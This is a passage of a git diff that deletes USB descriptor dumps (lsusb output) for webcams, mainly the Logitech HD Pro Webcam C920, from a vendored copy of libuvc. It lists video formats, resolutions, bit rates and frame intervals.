-        wWidth                            640
-        wHeight                           480
-        dwMinBitRate                383976960
-        dwMaxBitRate                383976960
-        dwMaxVideoFrameBufferSize      614400
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  0
-        dwMinFrameInterval             333333
-        dwMaxFrameInterval             333333
-        dwFrameIntervalStep                 0
-      VideoStreaming Interface Descriptor:
-        bLength                            38
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         2
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            352
-        wHeight                           288
-        dwMinBitRate                383976960
-        dwMaxBitRate                383976960
-        dwMaxVideoFrameBufferSize      202752
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  0
-        dwMinFrameInterval             333333
-        dwMaxFrameInterval             333333
-        dwFrameIntervalStep                 0
-      VideoStreaming Interface Descriptor:
-        bLength                            38
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         3
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            320
-        wHeight                           240
-        dwMinBitRate                383976960
-        dwMaxBitRate                383976960
-        dwMaxVideoFrameBufferSize      153600
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  0
-        dwMinFrameInterval             333333
-        dwMaxFrameInterval             333333
-        dwFrameIntervalStep                 0
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       1
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x82  EP 2 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x1400  3x 1024 bytes
-        bInterval               1
-Device Qualifier (for other device speed):
-  bLength                10
-  bDescriptorType         6
-  bcdUSB               2.00
-  bDeviceClass           14 Video
-  bDeviceSubClass         2 Video Streaming
-  bDeviceProtocol         0 
-  bMaxPacketSize0         8
-  bNumConfigurations      1
-Device Status:     0x0000
-  (Bus Powered)
diff --git a/thirdparty/libuvc-0.0.6/cameras/logitech_hd_pro_920.txt b/thirdparty/libuvc-0.0.6/cameras/logitech_hd_pro_920.txt
deleted file mode 100644
index 2fbe69c..0000000
--- a/thirdparty/libuvc-0.0.6/cameras/logitech_hd_pro_920.txt
+++ /dev/null
@@ -1,1817 +0,0 @@
-
-Bus 001 Device 018: ID 046d:082d Logitech, Inc. HD Pro Webcam C920
-Device Descriptor:
-  bLength                18
-  bDescriptorType         1
-  bcdUSB               2.00
-  bDeviceClass          239 Miscellaneous Device
-  bDeviceSubClass         2 ?
-  bDeviceProtocol         1 Interface Association
-  bMaxPacketSize0        64
-  idVendor           0x046d Logitech, Inc.
-  idProduct          0x082d HD Pro Webcam C920
-  bcdDevice            0.11
-  iManufacturer           0 
-  iProduct                2 HD Pro Webcam C920
-  iSerial                 1 E1CA2A7F
-  bNumConfigurations      1
-  Configuration Descriptor:
-    bLength                 9
-    bDescriptorType         2
-    wTotalLength         3452
-    bNumInterfaces          4
-    bConfigurationValue     1
-    iConfiguration          0 
-    bmAttributes         0x80
-      (Bus Powered)
-    MaxPower              500mA
-    Interface Association:
-      bLength                 8
-      bDescriptorType        11
-      bFirstInterface         0
-      bInterfaceCount         2
-      bFunctionClass         14 Video
-      bFunctionSubClass       3 Video Interface Collection
-      bFunctionProtocol       0 
-      iFunction               0 
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        0
-      bAlternateSetting       0
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      1 Video Control
-      bInterfaceProtocol      0 
-      iInterface              0 
-      VideoControl Interface Descriptor:
-        bLength                13
-        bDescriptorType        36
-        bDescriptorSubtype      1 (HEADER)
-        bcdUVC               1.00
-        wTotalLength          214
-        dwClockFrequency      300.000000MHz
-        bInCollection           1
-        baInterfaceNr( 0)       1
-      VideoControl Interface Descriptor:
-        bLength                18
-        bDescriptorType        36
-        bDescriptorSubtype      2 (INPUT_TERMINAL)
-        bTerminalID             1
-        wTerminalType      0x0201 Camera Sensor
-        bAssocTerminal          0
-        iTerminal               0 
-        wObjectiveFocalLengthMin      0
-        wObjectiveFocalLengthMax      0
-        wOcularFocalLength            0
-        bControlSize                  3
-        bmControls           0x00020a2e
-          Auto-Exposure Mode
-          Auto-Exposure Priority
-          Exposure Time (Absolute)
-          Focus (Absolute)
-          Zoom (Absolute)
-          PanTilt (Absolute)
-          Focus, Auto
-      VideoControl Interface Descriptor:
-        bLength                11
-        bDescriptorType        36
-        bDescriptorSubtype      5 (PROCESSING_UNIT)
-      Warning: Descriptor too short
-        bUnitID                 3
-        bSourceID               1
-        wMaxMultiplier      16384
-        bControlSize            2
-        bmControls     0x0000175b
-          Brightness
-          Contrast
-          Saturation
-          Sharpness
-          White Balance Temperature
-          Backlight Compensation
-          Gain
-          Power Line Frequency
-          White Balance Temperature, Auto
-        iProcessing             0 
-        bmVideoStandards     0x1b
-          None
-          NTSC - 525/60
-          SECAM - 625/50
-          NTSC - 625/50
-      VideoControl Interface Descriptor:
-        bLength                27
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                 6
-        guidExtensionCode         {d09ee423-7811-314f-ae52-d2fb8a8d3b48}
-        bNumControl            10
-        bNrPins                 1
-        baSourceID( 0)          3
-        bControlSize            2
-        bmControls( 0)       0xff
-        bmControls( 1)       0x03
-        iExtension              0 
-      VideoControl Interface Descriptor:
-        bLength                27
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                 8
-        guidExtensionCode         {e48e6769-0f41-db40-a850-7420d7d8240e}
-        bNumControl             7
-        bNrPins                 1
-        baSourceID( 0)          1
-        bControlSize            2
-        bmControls( 0)       0x3b
-        bmControls( 1)       0x03
-        iExtension              0 
-      VideoControl Interface Descriptor:
-        bLength                28
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                 9
-        guidExtensionCode         {a94c5d1f-11de-8744-840d-50933c8ec8d1}
-        bNumControl            17
-        bNrPins                 1
-        baSourceID( 0)          1
-        bControlSize            3
-        bmControls( 0)       0xf3
-        bmControls( 1)       0xff
-        bmControls( 2)       0x23
-        iExtension              0 
-      VideoControl Interface Descriptor:
-        bLength                27
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                10
-        guidExtensionCode         {1502e449-34f4-fe47-b158-0e885023e51b}
-        bNumControl             7
-        bNrPins                 1
-        baSourceID( 0)          1
-        bControlSize            2
-        bmControls( 0)       0xaa
-        bmControls( 1)       0x07
-        iExtension              0 
-      VideoControl Interface Descriptor:
-        bLength                27
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                11
-        guidExtensionCode         {212de5ff-3080-2c4e-82d9-f587d00540bd}
-        bNumControl             2
-        bNrPins                 1
-        baSourceID( 0)          1
-        bControlSize            2
-        bmControls( 0)       0x00
-        bmControls( 1)       0x41
-        iExtension              0 
-      VideoControl Interface Descriptor:
-        bLength                27
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                12
-        guidExtensionCode         {41769ea2-04de-e347-8b2b-f4341aff003b}
-        bNumControl            11
-        bNrPins                 1
-        baSourceID( 0)          3
-        bControlSize            2
-        bmControls( 0)       0x07
-        bmControls( 1)       0x7f
-        iExtension              0 
-      VideoControl Interface Descriptor:
-        bLength                 9
-        bDescriptorType        36
-        bDescriptorSubtype      3 (OUTPUT_TERMINAL)
-        bTerminalID             4
-        wTerminalType      0x0101 USB Streaming
-        bAssocTerminal          0
-        bSourceID               3
-        iTerminal               0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x83  EP 3 IN
-        bmAttributes            3
-          Transfer Type            Interrupt
-          Synch Type               None
-          Usage Type               Data
-        wMaxPacketSize     0x0040  1x 64 bytes
-        bInterval               8
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       0
-      bNumEndpoints           0
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      VideoStreaming Interface Descriptor:
-        bLength                            16
-        bDescriptorType                    36
-        bDescriptorSubtype                  1 (INPUT_HEADER)
-        bNumFormats                         3
-        wTotalLength                     2822
-        bEndPointAddress                  129
-        bmInfo                              0
-        bTerminalLink                       4
-        bStillCaptureMethod                 0
-        bTriggerSupport                     0
-        bTriggerUsage                       0
-        bControlSize                        1
-        bmaControls( 0)                    27
-        bmaControls( 1)                    27
-        bmaControls( 2)                    27
-      VideoStreaming Interface Descriptor:
-        bLength                            27
-        bDescriptorType                    36
-        bDescriptorSubtype                  4 (FORMAT_UNCOMPRESSED)
-        bFormatIndex                        1
-        bNumFrameDescriptors               19
-        guidFormat                            {59555932-0000-1000-8000-00aa00389b71}
-        bBitsPerPixel                      16
-        bDefaultFrameIndex                  1
-        bAspectRatioX                       0
-        bAspectRatioY                       0
-        bmInterlaceFlags                 0x00
-          Interlaced stream or variable: No
-          Fields per frame: 2 fields
-          Field 1 first: No
-          Field pattern: Field 1 only
-          bCopyProtect                      0
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         1
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           480
-        dwMinBitRate                 24576000
-        dwMaxBitRate                147456000
-        dwMaxVideoFrameBufferSize      614400
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         2
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            160
-        wHeight                            90
-        dwMinBitRate                  1152000
-        dwMaxBitRate                  6912000
-        dwMaxVideoFrameBufferSize       28800
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         3
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            160
-        wHeight                           120
-        dwMinBitRate                  1536000
-        dwMaxBitRate                  9216000
-        dwMaxVideoFrameBufferSize       38400
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         4
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            176
-        wHeight                           144
-        dwMinBitRate                  2027520
-        dwMaxBitRate                 12165120
-        dwMaxVideoFrameBufferSize       50688
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         5
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            320
-        wHeight                           180
-        dwMinBitRate                  4608000
-        dwMaxBitRate                 27648000
-        dwMaxVideoFrameBufferSize      115200
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         6
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            320
-        wHeight                           240
-        dwMinBitRate                  6144000
-        dwMaxBitRate                 36864000
-        dwMaxVideoFrameBufferSize      153600
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         7
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            352
-        wHeight                           288
-        dwMinBitRate                  8110080
-        dwMaxBitRate                 48660480
-        dwMaxVideoFrameBufferSize      202752
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         8
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            432
-        wHeight                           240
-        dwMinBitRate                  8294400
-        dwMaxBitRate                 49766400
-        dwMaxVideoFrameBufferSize      207360
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         9
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           360
-        dwMinBitRate                 18432000
-        dwMaxBitRate                110592000
-        dwMaxVideoFrameBufferSize      460800
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        10
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           448
-        dwMinBitRate                 28672000
-        dwMaxBitRate                172032000
-        dwMaxVideoFrameBufferSize      716800
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        11
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           600
-        dwMinBitRate                 38400000
-        dwMaxBitRate                184320000
-        dwMaxVideoFrameBufferSize      960000
-        dwDefaultFrameInterval         416666
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            416666
-        dwFrameInterval( 1)            500000
-        dwFrameInterval( 2)            666666
-        dwFrameInterval( 3)           1000000
-        dwFrameInterval( 4)           1333333
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        12
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            864
-        wHeight                           480
-        dwMinBitRate                 33177600
-        dwMaxBitRate                159252480
-        dwMaxVideoFrameBufferSize      829440
-        dwDefaultFrameInterval         416666
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            416666
-        dwFrameInterval( 1)            500000
-        dwFrameInterval( 2)            666666
-        dwFrameInterval( 3)           1000000
-        dwFrameInterval( 4)           1333333
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            42
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        13
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            960
-        wHeight                           720
-        dwMinBitRate                 55296000
-        dwMaxBitRate                165888000
-        dwMaxVideoFrameBufferSize     1382400
-        dwDefaultFrameInterval         666666
-        bFrameIntervalType                  4
-        dwFrameInterval( 0)            666666
-        dwFrameInterval( 1)           1000000
-        dwFrameInterval( 2)           1333333
-        dwFrameInterval( 3)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            42
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        14
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1024
-        wHeight                           576
-        dwMinBitRate                 47185920
-        dwMaxBitRate                141557760
-        dwMaxVideoFrameBufferSize     1179648
-        dwDefaultFrameInterval         666666
-        bFrameIntervalType                  4
-        dwFrameInterval( 0)            666666
-        dwFrameInterval( 1)           1000000
-        dwFrameInterval( 2)           1333333
-        dwFrameInterval( 3)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            38
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        15
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1280
-        wHeight                           720
-        dwMinBitRate                 73728000
-        dwMaxBitRate                147456000
-        dwMaxVideoFrameBufferSize     1843200
-        dwDefaultFrameInterval        1000000
-        bFrameIntervalType                  3
-        dwFrameInterval( 0)           1000000
-        dwFrameInterval( 1)           1333333
-        dwFrameInterval( 2)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            34
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        16
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1600
-        wHeight                           896
-        dwMinBitRate                114688000
-        dwMaxBitRate                172032000
-        dwMaxVideoFrameBufferSize     2867200
-        dwDefaultFrameInterval        1333333
-        bFrameIntervalType                  2
-        dwFrameInterval( 0)           1333333
-        dwFrameInterval( 1)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        17
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1920
-        wHeight                          1080
-        dwMinBitRate                165888000
-        dwMaxBitRate                165888000
-        dwMaxVideoFrameBufferSize     4147200
-        dwDefaultFrameInterval        2000000
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        18
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           2304
-        wHeight                          1296
-        dwMinBitRate                238878720
-        dwMaxBitRate                238878720
-        dwMaxVideoFrameBufferSize     5971968
-        dwDefaultFrameInterval        4999998
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)           4999998
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                        19
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           2304
-        wHeight                          1536
-        dwMinBitRate                283115520
-        dwMaxBitRate                283115520
-        dwMaxVideoFrameBufferSize     7077888
-        dwDefaultFrameInterval        4999998
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)           4999998
-      VideoStreaming Interface Descriptor:
-        bLength                             6
-        bDescriptorType                    36
-        bDescriptorSubtype                 13 (COLORFORMAT)
-        bColorPrimaries                     1 (BT.709,sRGB)
-        bTransferCharacteristics            1 (BT.709)
-        bMatrixCoefficients                 4 (SMPTE 170M (BT.601))
-      VideoStreaming Interface Descriptor:
-        bLength                            28
-        bDescriptorType                    36
-        bDescriptorSubtype                 16 (FORMAT_FRAME_BASED)
-        bFormatIndex                        2
-        bNumFrameDescriptors               17
-        guidFormat                            {48323634-0000-1000-8000-00aa00389b71}
-        bBitsPerPixel                      16
-        bDefaultFrameIndex                  1
-        bAspectRatioX                       0
-        bAspectRatioY                       0
-        bmInterlaceFlags                 0x00
-          Interlaced stream or variable: No
-          Fields per frame: 2 fields
-          Field 1 first: No
-          Field pattern: Field 1 only
-          bCopyProtect                      0
-          bVariableSize                     1
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                         1
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           480
-        dwMinBitRate                 24576000
-        dwMaxBitRate                147456000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                         2
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            160
-        wHeight                            90
-        dwMinBitRate                  1152000
-        dwMaxBitRate                  6912000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                         3
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            160
-        wHeight                           120
-        dwMinBitRate                  1536000
-        dwMaxBitRate                  9216000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                         4
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            176
-        wHeight                           144
-        dwMinBitRate                  2027520
-        dwMaxBitRate                 12165120
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                         5
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            320
-        wHeight                           180
-        dwMinBitRate                  4608000
-        dwMaxBitRate                 27648000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                         6
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            320
-        wHeight                           240
-        dwMinBitRate                  6144000
-        dwMaxBitRate                 36864000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                         7
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            352
-        wHeight                           288
-        dwMinBitRate                  8110080
-        dwMaxBitRate                 48660480
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                         8
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            432
-        wHeight                           240
-        dwMinBitRate                  8294400
-        dwMaxBitRate                 49766400
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                         9
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           360
-        dwMinBitRate                 18432000
-        dwMaxBitRate                110592000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                        10
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           448
-        dwMinBitRate                 28672000
-        dwMaxBitRate                172032000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
-        dwFrameInterval( 6)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            54
-        bDescriptorType                    36
-        bDescriptorSubtype                 17 (FRAME_FRAME_BASED)
-        bFrameIndex                        11
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           600
-        dwMinBitRate                 38400000
-        dwMaxBitRate                230400000
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  7
-        dwBytesPerLine                      0
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            416666
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           1333333
